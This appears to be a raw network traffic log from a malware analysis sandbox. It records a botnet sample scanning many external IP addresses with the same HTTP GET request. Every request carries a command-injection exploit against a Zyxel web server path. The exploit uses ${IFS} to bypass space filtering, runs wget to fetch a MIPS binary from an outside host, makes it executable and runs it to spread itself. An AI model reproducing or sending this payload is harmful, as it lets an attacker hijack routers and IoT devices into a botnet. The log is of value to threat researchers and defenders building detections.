                                            Jan 14, 2024 15:50:57.805393934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9192192.168.2.23502664.49.110.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805447102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9193192.168.2.234199861.109.214.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805484056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9194192.168.2.2359336187.242.121.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805536985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9195192.168.2.2358428213.61.184.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805592060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9196192.168.2.23438424.160.118.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805649042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9197192.168.2.2345288205.67.40.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805677891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9198192.168.2.2352366129.34.57.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805737019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9199192.168.2.2342106122.128.28.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805757999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9200192.168.2.2340840156.108.186.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805804014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9201192.168.2.23521684.233.48.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805854082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9202192.168.2.235518241.189.164.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805883884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9203192.168.2.2354112223.255.172.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805948973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9204192.168.2.2356472110.34.70.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805984020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9205192.168.2.23460725.190.62.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806003094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9206192.168.2.234842034.110.38.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806042910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9207192.168.2.2333084169.228.160.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806113005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9208192.168.2.235199051.74.186.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806145906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9209192.168.2.2352900158.99.253.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806178093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9210192.168.2.2347134100.0.218.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806237936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9211192.168.2.2335204186.156.245.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806258917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9212192.168.2.2352378193.251.73.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806318045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9213192.168.2.233994681.148.3.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806346893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9214192.168.2.2359966212.141.37.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806387901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9215192.168.2.235924669.221.216.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806442976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9216192.168.2.233490880.96.102.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806469917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9217192.168.2.2334502176.37.53.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806543112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9218192.168.2.2348668117.64.216.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806576967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9219192.168.2.235346044.89.95.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806611061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9220192.168.2.234997431.135.136.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806658983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9221192.168.2.2345928174.138.152.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806715965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9222192.168.2.2332770187.119.28.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806747913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9223192.168.2.234785849.160.203.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806785107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9224192.168.2.2340042108.157.187.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806854010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9225192.168.2.2344140126.75.37.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806904078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9226192.168.2.2357874199.131.41.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806931973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9227192.168.2.2337528139.24.104.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.806968927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9228192.168.2.2355188129.196.29.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807034016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9229192.168.2.235241650.20.33.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807074070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9230192.168.2.2356928102.71.148.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807105064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9231192.168.2.2353720131.142.55.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807138920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9232192.168.2.234505038.13.48.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807224035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9233192.168.2.23351728.253.78.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807264090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9234192.168.2.2346882163.173.159.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807282925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9235192.168.2.2359600142.89.109.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807348967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9236192.168.2.2359462169.54.71.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807384014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9237192.168.2.2358868136.127.214.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807415009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9238192.168.2.2354366149.55.38.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807475090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9239192.168.2.2354532186.89.181.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807519913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9240192.168.2.234128672.6.178.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807595015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9241192.168.2.2335000192.154.240.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807631969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9242192.168.2.2344636132.61.170.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807658911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9243192.168.2.234560813.254.31.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807719946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9244192.168.2.235922213.201.250.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807753086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9245192.168.2.233733032.183.12.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807780981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9246192.168.2.2333586195.250.194.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807821035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9247192.168.2.2338194171.65.3.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807847977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9248192.168.2.234876851.166.33.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807918072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9249192.168.2.2358560190.76.198.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807962894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9250192.168.2.2348966113.62.125.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.807986021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9251192.168.2.2342690176.39.137.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808020115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9252192.168.2.234988643.20.190.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808084965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9253192.168.2.233305414.70.48.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808129072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9254192.168.2.235810841.196.131.5443
                                            TimestampBytes transferredDirectionData
